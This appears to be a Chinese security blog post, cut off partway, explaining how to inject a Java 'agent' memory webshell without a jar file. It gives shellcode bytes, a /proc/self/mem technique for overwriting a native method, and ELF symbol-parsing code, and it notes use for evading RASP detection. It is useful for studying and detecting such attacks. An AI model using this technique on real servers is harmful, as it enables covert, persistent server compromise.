<!DOCTYPE html>
<html lang=zh>
<head>
    <!-- so meta -->
    <meta charset="utf-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="HandheldFriendly" content="True">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=5" />
    <meta name="description" content="agent内存马相比于FIlter、Servlet等内存马，不会产生新class，相对较隐蔽，通用性更强。但传统的agent是基于jar文件实现的,本于复现了@rebeyond、@游忘之 提出的无文件注入agent内存马技术。 demo：https:&#x2F;&#x2F;github.com&#x2F;yaoyao-cool&#x2F;no_file_agent_mem_shell 分析一般的agent内存马，需要调用inst.red">
<meta property="og:type" content="article">
<meta property="og:title" content="无文件agent内存马">
<meta property="og:url" content="http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/index.html">
<meta property="og:site_name" content="之间太多空白">
<meta property="og:description" content="agent内存马相比于FIlter、Servlet等内存马，不会产生新class，相对较隐蔽，通用性更强。但传统的agent是基于jar文件实现的,本于复现了@rebeyond、@游忘之 提出的无文件注入agent内存马技术。 demo：https:&#x2F;&#x2F;github.com&#x2F;yaoyao-cool&#x2F;no_file_agent_mem_shell 分析一般的agent内存马，需要调用inst.red">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/9a612857833c30cbca69b788e87afa6f.png">
<meta property="og:image" content="http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/27a7f21024c4a15a18803454ecd2ebe1.png">
<meta property="og:image" content="http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/d8758f663d49e35fbe442b42d501eac4.png">
<meta property="og:image" content="http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/cad4d29b33884627ccc0b28d260c20b4.png">
<meta property="og:image" content="http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/4facf2b0a807fd66eae68fa08388be5e.png">
<meta property="og:image" content="http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/98dc9bb6e3cb7779388e56d0465be1d8.png">
<meta property="og:image" content="http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/53755bc83f23ade92edd6d5d8b0b0604.png">
<meta property="og:image" content="http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/3c03b0a4ad3d5eb1c05e92f83e620504.png">
<meta property="og:image" content="http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/9033539a22f43d92a54cc96c3609d900.png">
<meta property="article:published_time" content="2024-04-24T09:38:55.000Z">
<meta property="article:modified_time" content="2025-07-15T06:03:25.237Z">
<meta property="article:author" content="yy">
<meta property="article:tag" content="java">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/9a612857833c30cbca69b788e87afa6f.png">
    
    
      
        
          <link rel="shortcut icon" href="/images/logo.JPG">
        
      
      
        
          <link rel="icon" type="image/png" href="/images/logo.JPG" sizes="192x192">
        
      
      
        
          <link rel="apple-touch-icon" sizes="180x180" href="/images/logo.JPG">
        
      
    
    <!-- title -->
    <title>无文件agent内存马</title>
    <!-- async scripts -->
    <!-- Google Analytics -->


    <!-- Umami Analytics -->


    <!-- styles -->
    
<link rel="stylesheet" href="/css/style.css">

    <!-- persian styles -->
    
    <!-- rss -->
    
    
	<!-- mathjax -->
	
<meta name="generator" content="Hexo 7.3.0"></head>

<body class="max-width mx-auto px3 ltr">
    
      <div id="header-post">
  <a id="menu-icon" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="menu-icon-tablet" href="#" aria-label="目录"><i class="fa-solid fa-bars fa-lg"></i></a>
  <a id="top-icon-tablet" href="#" aria-label="顶部" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');" style="display:none;"><i class="fa-solid fa-chevron-up fa-lg"></i></a>
  <span id="menu">
    <span id="nav">
      <ul>
        <!--
       --><li><a href="/">首页</a></li><!--
     --><!--
       --><li><a href="/about/">关于</a></li><!--
     --><!--
       --><li><a href="/archives/">归档</a></li><!--
     --><!--
       --><li><a href="/tags/">标签</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="http://github.com/yaoyao-cool">项目</a></li><!--
     -->
      </ul>
    </span>
    <br/>
    <span id="actions">
      <ul>
        
        <li><a class="icon" aria-label="上一篇" href="/2024/05/02/SpringBoot%E4%B8%8B%E7%9A%84%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E5%88%A9%E7%94%A8/"><i class="fa-solid fa-chevron-left" aria-hidden="true" onmouseover="$('#i-prev').toggle();" onmouseout="$('#i-prev').toggle();"></i></a></li>
        
        
        <li><a class="icon" aria-label="下一篇" href="/2023/04/04/HTB-Authority/"><i class="fa-solid fa-chevron-right" aria-hidden="true" onmouseover="$('#i-next').toggle();" onmouseout="$('#i-next').toggle();"></i></a></li>
        
        <li><a class="icon" aria-label="返回顶部" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up" aria-hidden="true" onmouseover="$('#i-top').toggle();" onmouseout="$('#i-top').toggle();"></i></a></li>
        <li><a class="icon" aria-label="分享文章" href="#"><i class="fa-solid fa-share-alt" aria-hidden="true" onmouseover="$('#i-share').toggle();" onmouseout="$('#i-share').toggle();" onclick="$('#share').toggle();return false;"></i></a></li>
      </ul>
      <span id="i-prev" class="info" style="display:none;">上一篇</span>
      <span id="i-next" class="info" style="display:none;">下一篇</span>
      <span id="i-top" class="info" style="display:none;">返回顶部</span>
      <span id="i-share" class="info" style="display:none;">分享文章</span>
    </span>
    <br/>
    <div id="share" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/"><i class="fab fa-facebook " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&text=无文件agent内存马"><i class="fab fa-twitter " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&title=无文件agent内存马"><i class="fab fa-linkedin " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&is_video=false&description=无文件agent内存马"><i class="fab fa-pinterest " aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=无文件agent内存马&body=Check out this article: http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/"><i class="fa-solid fa-envelope " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&title=无文件agent内存马"><i class="fab fa-get-pocket " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&title=无文件agent内存马"><i class="fab fa-reddit " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&title=无文件agent内存马"><i class="fab fa-stumbleupon " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&title=无文件agent内存马"><i class="fab fa-digg " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&name=无文件agent内存马&description="><i class="fab fa-tumblr " aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=http://oh3r.vip/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/&t=无文件agent内存马"><i class="fab fa-hacker-news " aria-hidden="true"></i></a></li>
</ul>

    </div>
    
    
      <div id="toc">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%88%86%E6%9E%90"><span class="toc-number">1.</span> <span class="toc-text">分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#JVM%E6%80%8E%E4%B9%88%E5%88%9B%E5%BB%BA-JPLISAgent"><span class="toc-number">2.</span> <span class="toc-text">JVM怎么创建_JPLISAgent</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%B0%83%E7%94%A8%E4%BB%BB%E6%84%8FNative%E6%96%B9%E6%B3%95"><span class="toc-number">3.</span> <span class="toc-text">调用任意Native方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%9E%84%E9%80%A0shellcode"><span class="toc-number">4.</span> <span class="toc-text">构造shellcode</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E6%9E%90elf"><span class="toc-number">5.</span> <span class="toc-text">解析elf</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%A1%AB%E5%85%85shellcode%EF%BC%8C%E5%86%99%E5%85%A5%E5%86%85%E5%AD%98"><span class="toc-number">6.</span> <span class="toc-text">填充shellcode，写入内存</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BC%AA%E9%80%A0JPLISAgent"><span class="toc-number">7.</span> <span class="toc-text">伪造JPLISAgent</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B3%A8%E5%85%A5webshell"><span class="toc-number">8.</span> <span class="toc-text">注入webshell</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E8%A7%A3%E5%86%B3%E6%8A%A5%E9%94%99"><span class="toc-number">9.</span> <span class="toc-text">解决报错</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%B5%8B%E8%AF%95"><span class="toc-number">10.</span> <span class="toc-text">测试</span></a></li></ol>
      </div>
    
  </span>
</div>

    
    <div class="content index py4 ">
        
        <article class="post h-entry" itemscope itemtype="http://schema.org/BlogPosting">
  <header>
    
    <h1 class="posttitle p-name" itemprop="name headline">
        无文件agent内存马
    </h1>



    <div class="meta">
      <span class="author p-author h-card" itemprop="author" itemscope itemtype="http://schema.org/Person">
        <span class="p-name" itemprop="name">yy</span>
      </span>
      
    <div class="postdate">
      
        <time datetime="2024-04-24T09:38:55.000Z" class="dt-published" itemprop="datePublished">2024-04-24</time>
        
      
    </div>


      

      
    <div class="article-tag">
        <i class="fa-solid fa-tag"></i>
        <a class="p-category" href="/tags/java/" rel="tag">java</a>
    </div>


    </div>
  </header>
  

  <div class="content e-content" itemprop="articleBody">
    <p>agent内存马相比于FIlter、Servlet等内存马，不会产生新class，相对较隐蔽，通用性更强。<br>但传统的agent是基于jar文件实现的,本于复现了@rebeyond、@游忘之 提出的无文件注入agent内存马技术。</p>
<p>demo：<br><a target="_blank" rel="noopener" href="https://github.com/yaoyao-cool/no_file_agent_mem_shell">https://github.com/yaoyao-cool/no_file_agent_mem_shell</a></p>
<h2 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h2><p>一般的agent内存马，需要调用inst.redefineClasses。<br>sun.instrument.InstrumentationImpl#redefineClasses<br>sun.instrument.InstrumentationImpl#redefineClasses0<br>最终调用到这个native方法</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">native</span> <span class="keyword">void</span> <span class="title function_">redefineClasses0</span><span class="params">(<span class="type">long</span> var1, ClassDefinition[] var3)</span> <span class="keyword">throws</span> ClassNotFoundException;</span><br></pre></td></tr></table></figure>

<p>根据方法名，从jdk源码中搜索该方法的具体实现<br><img src="/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/9a612857833c30cbca69b788e87afa6f.png"><br>其中，从java传入的参数为agent和classes。<br>agent是一个<code>_JPLISAgent</code>结构体的指针，classDefinitions就是存储class字节码的数组。</p>
<p>回到java中，这个指针是InstrumentationImpl类中的一个属性，所以理论上如果要直接调用<code>redefineClasses</code>去修改类字节码的话，需要获取到<code>_JPLISAgent</code>结构体的指针。<br>在使用jar包的方式注入内存马时，InstrumentationImpl对象是由JVM传进来的，这个<code>_JPLISAgent</code>是设置好的，但是如果不使用jar包注入，需要手工去获取到这个指针。<br><img src="/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/27a7f21024c4a15a18803454ecd2ebe1.png"><br><img src="/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/d8758f663d49e35fbe442b42d501eac4.png"></p>
<p>跟进redefineClasses<br><img src="/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/cad4d29b33884627ccc0b28d260c20b4.png"><br>首先将agent传入到一个宏中</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">#define jvmti(a) a-&gt;mNormalEnvironment.mJVMTIEnv</span><br></pre></td></tr></table></figure>

<p>之后所有的操作，都是在从宏中返回的<code>jvmtiEnv*</code>上操作的<br><code>_JPLISAgent</code></p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">struct _JPLISAgent &#123;</span><br><span class="line">    JavaVM *                mJVM;                   <span class="comment">/* handle to the JVM */</span></span><br><span class="line">    JPLISEnvironment        mNormalEnvironment;     <span class="comment">/* for every thing but retransform stuff */</span></span><br><span class="line">    JPLISEnvironment        mRetransformEnvironment;<span class="comment">/* for retransform stuff only */</span></span><br><span class="line">    jobject                 mInstrumentationImpl;   <span class="comment">/* handle to the Instrumentation instance */</span></span><br><span class="line">    jmethodID               mPremainCaller;         <span class="comment">/* method on the InstrumentationImpl that does the premain stuff (cached to save lots of lookups) */</span></span><br><span class="line">    jmethodID               mAgentmainCaller;       <span class="comment">/* method on the InstrumentationImpl for agents loaded via attach mechanism */</span></span><br><span class="line">    jmethodID               mTransform;             <span class="comment">/* method on the InstrumentationImpl that does the class file transform */</span></span><br><span class="line">    jboolean                mRedefineAvailable;     <span class="comment">/* cached answer to &quot;does this agent support redefine&quot; */</span></span><br><span class="line">    jboolean                mRedefineAdded;         <span class="comment">/* indicates if can_redefine_classes capability has been added */</span></span><br><span class="line">    jboolean                mNativeMethodPrefixAvailable; <span class="comment">/* cached answer to &quot;does this agent support prefixing&quot; */</span></span><br><span class="line">    jboolean                mNativeMethodPrefixAdded;     <span class="comment">/* indicates if can_set_native_method_prefix capability has been added */</span></span><br><span class="line">    <span class="type">char</span> const *            mAgentClassName;        <span class="comment">/* agent class name */</span></span><br><span class="line">    <span class="type">char</span> const *            mOptionsString;         <span class="comment">/* -javaagent options string */</span></span><br><span class="line">    const <span class="type">char</span> *            mJarfile;               <span class="comment">/* agent jar file name */</span></span><br><span class="line">&#125;;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p>宏中返回的是<code>_jvmtiEnv</code>结构体<br><img src="/2024/04/24/%E6%97%A0%E6%96%87%E4%BB%B6agent%E5%86%85%E5%AD%98%E9%A9%AC/4facf2b0a807fd66eae68fa08388be5e.png"><br>所以<code>_JPLISAgent</code>在这里的作用就是获取<code>_jvmtiEnv</code></p>
<h2 id="JVM怎么创建-JPLISAgent"><a href="#JVM怎么创建-JPLISAgent" class="headerlink" title="JVM怎么创建_JPLISAgent"></a>JVM怎么创建_JPLISAgent</h2><p>createNewJPLISAgent</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">JPLISInitializationError</span></span><br><span class="line"><span class="function"><span class="title">createNewJPLISAgent</span><span class="params">(JavaVM * vm, JPLISAgent **agent_ptr)</span> </span>&#123;</span><br><span class="line">    JPLISInitializationError initerror       = JPLIS_INIT_ERROR_NONE;</span><br><span class="line">    jvmtiEnv *               jvmtienv        = <span class="literal">NULL</span>;</span><br><span class="line">    jint                     jnierror        = JNI_OK;</span><br><span class="line"></span><br><span class="line">    *agent_ptr = <span class="literal">NULL</span>;</span><br><span class="line">    jnierror = (*vm)-&gt;<span class="built_in">GetEnv</span>(  vm,</span><br><span class="line">                               (<span class="type">void</span> **) &amp;jvmtienv,</span><br><span class="line">                               JVMTI_VERSION_1_1);</span><br><span class="line">    <span class="keyword">if</span> ( jnierror != JNI_OK ) &#123;</span><br><span class="line">        initerror = JPLIS_INIT_ERROR_CANNOT_CREATE_NATIVE_AGENT;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        JPLISAgent * agent = <span class="built_in">allocateJPLISAgent</span>(jvmtienv);</span><br><span class="line">        <span class="keyword">if</span> ( agent == <span class="literal">NULL</span> ) &#123;</span><br><span class="line">            initerror = JPLIS_INIT_ERROR_ALLOCATION_FAILURE;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            initerror = <span class="built_in">initializeJPLISAgent</span>(  agent,</span><br><span class="line">                                               vm,</span><br><span class="line">                                               jvmtienv);</span><br><span class="line">            <span class="keyword">if</span> ( initerror == JPLIS_INIT_ERROR_NONE ) &#123;</span><br><span class="line">                *agent_ptr = agent;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="built_in">deallocateJPLISAgent</span>(jvmtienv, agent);</span><br><span class="line">            &#125;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="comment">/* don&#x27;t leak envs */</span></span><br><span class="line">        <span class="keyword">if</span> ( initerror != JPLIS_INIT_ERROR_NONE ) &#123;</span><br><span class="line">            jvmtiError jvmtierror = (*jvmtienv)-&gt;<span class="built_in">DisposeEnvironment</span>(jvmtienv);</span><br><span class="line">            <span class="comment">/* can be called from any phase */</span></span><br><span class="line">            <span class="built_in">jplis_assert</span>(jvmtierror == JVMTI_ERROR_NONE);</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">return</span> initerror;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>通过createNewJPLISAgent方法可以获得JPLISAgent对象，但是该方法没有导出，不能从外部直接调用。<br>从该函数中发现,可以通过JavaVM获取jvmtienv。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">jnierror = (*vm)-&gt;GetEnv(  vm,</span><br><span class="line">                           (<span class="type">void</span> **) &amp;jvmtienv,</span><br><span class="line">                           JVMTI_VERSION_1_1);</span><br></pre></td></tr></table></figure>

<p>关于JavaVM对象，在jni.h中，定义了一个导出方法，在libjvm.so库中</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">_JNI_IMPORT_OR_EXPORT_ jint JNICALL </span><br><span class="line"><span class="title function_">JNI_GetCreatedJavaVMs</span><span class="params">(JavaVM **, jsize, jsize *)</span>;</span><br></pre></td></tr></table></figure>

<p>只要调用到这个方法，就可以获得JavaVM对象<br>通过JavaVM，获取jvmtienv指针。<br>在Java中，使用unsafe申请一块内存，作为_JPLISAgent结构体，并在相应的偏移上，放上jvmtienv指针。（这里在前面分析过了，<code>_JPLISAgent</code>结构体的作用就是通过<code>jvmti</code>宏获得<code>jvmtienv</code>指针）</p>
<h2 id="调用任意Native方法"><a href="#调用任意Native方法" class="headerlink" title="调用任意Native方法"></a>调用任意Native方法</h2><p>这里涉及到另一个问题，怎么调用<code>JNI_GetCreatedJavaVMs</code>方法。<br>在linux下，可以通过&#x2F;proc&#x2F;self&#x2F;mem，访问当前进程空间的内存，并且具有完整的读写权限。<br>所以这里的思路是：<br>通过&#x2F;proc&#x2F;self&#x2F;mem，修改任意一个返回类型为lone的native方法，即将shellcode写入到该方法的地址上，在java层调用这个native方法，即可触发构造的shellcode。<br>（这个思路不只用于写内存马，有很多利用场景，比如绕过rasp对某些敏感函数的检测）</p>
<p>在shellcode中：<br>    写入调用JNI_GetCreatedJavaVMs方法的逻辑，并且使用返回的JavaVM对象，获取jvmtienv指针。<br>    对应的C++代码为</p>
<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">struct</span> <span class="title class_">JavaVM_</span> * vm;</span><br><span class="line">jsize count;</span><br><span class="line"><span class="built_in">JNI_GetCreatedJavaVMs</span>(&amp;vm, <span class="number">1</span>, &amp;count);</span><br><span class="line"><span class="keyword">struct</span> <span class="title class_">jvmtiEnv_</span> * _jvmti_env; </span><br><span class="line">vm-&gt;functions-&gt;<span class="built_in">GetEnv</span>(vm, (<span class="type">void</span> **)&amp;_jvmti_env, JVMTI_VERSION_1_2);</span><br><span class="line"><span class="keyword">return</span> _jvmti_env;</span><br></pre></td></tr></table></figure>

<h2 id="构造shellcode"><a href="#构造shellcode" class="headerlink" title="构造shellcode"></a>构造shellcode</h2><p>对应的汇编代码</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">push rbp</span><br><span class="line">mov rbp,rsp</span><br><span class="line">sub rsp,<span class="number">0x20</span></span><br><span class="line">mov rax,<span class="number">0x1234567890123456</span></span><br><span class="line">lea rdi,[rsp+<span class="number">16</span>]</span><br><span class="line">mov rsi,<span class="number">0x1</span></span><br><span class="line">lea rdx,[rsp+<span class="number">8</span>]</span><br><span class="line">call rax</span><br><span class="line">mov rdi,[rsp+<span class="number">16</span>]</span><br><span class="line">mov rdx,<span class="number">0x30010200</span></span><br><span class="line">lea rsi,[rsp+<span class="number">8</span>]</span><br><span class="line">mov rax,[rdi]</span><br><span class="line">call [rax+<span class="number">48</span>]</span><br><span class="line">mov rax,[rsp+<span class="number">8</span>]</span><br><span class="line">add rsp,<span class="number">0x20</span></span><br><span class="line">pop rbp</span><br><span class="line">ret</span><br></pre></td></tr></table></figure>

<p>其中JNI_GetCreatedJavaVMs的地址，先用<code>0x1234567890123456</code>替代，因为库的加载地址是不固定的，不同版本的库，函数偏移也可能不同。<br>根据前面的c++代码，JNI_GetCreatedJavaVMs的第一个参数，实际个两层的指针，但函数内部实际只解一层指针，所以这里<code>rdi</code>直接指到了栈上，函数会把JavaVM的指针写到栈上。</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">*vm_buf = (JavaVM *)(&amp;main_vm);</span><br></pre></td></tr></table></figure>

<p>将上面的汇编代码编译成机器码</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0x55,0x48,0x89,0xe5,0x48,0x83,0xec,0x20,0x48,0xb8,0x56,0x34,0x12,0x90,0x78,0x56,0x34,0x12,0x48,0x8d,0x7c,0x24,0x10,0xbe,0x01,0x00,0x00,0x00,0x48,0x8d,0x54,0x24,0x08,0xff,0xd0,0x48,0x8b,0x7c,0x24,0x10,0xba,0x00,0x02,0x01,0x30,0x48,0x8d,0x74,0x24,0x08,0x48,0x8b,0x07,0xff,0x50,0x30,0x48,0x8b,0x44,0x24,0x08,0x48,0x83,0xc4,0x20,0x5d,0xc3</span><br></pre></td></tr></table></figure>

<p>其中的函数地址部分，待会需要抠出来替换为真正的函数地址。</p>
<p>因为要写shellcode到指定的函数地址上，所以首先要获取到函数在内存中的真实地址。<br>思路：<br>通过&#x2F;proc&#x2F;self&#x2F;maps，获取到动态链接库的加载地址<br>通过java中提供的方法，获取到jdk的目录，解析jdk目录中的动态链接库符号表，获取函数的偏移<br>加载地址和函数偏移相加，得到真实地址。</p>
<p>实际要拿两个函数的地址，一个是<code>JNI_GetCreatedJavaVMs</code>,一个是要被覆盖的native函数地址，最好是不常用的，避免程序崩溃，这里就以libjava.so中的<code>Java_java_io_RandomAccessFile_length</code>为例。</p>
<h2 id="解析elf"><a href="#解析elf" class="headerlink" title="解析elf"></a>解析elf</h2><p>就是解析符号表，获取对应函数的偏移地址。</p>
<ol>
<li>读取ELF Header，获取Section Header Table的地址</li>
<li>读取Section Header Table，得到符号表和符号表对应的字符表的地址</li>
<li>遍历符号表，根据每个符号的name 偏移，去字符表中找函数名</li>
<li>找到需要的函数名后，返回其在符号表中的地址。<br>完整代码</li>
</ol>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span 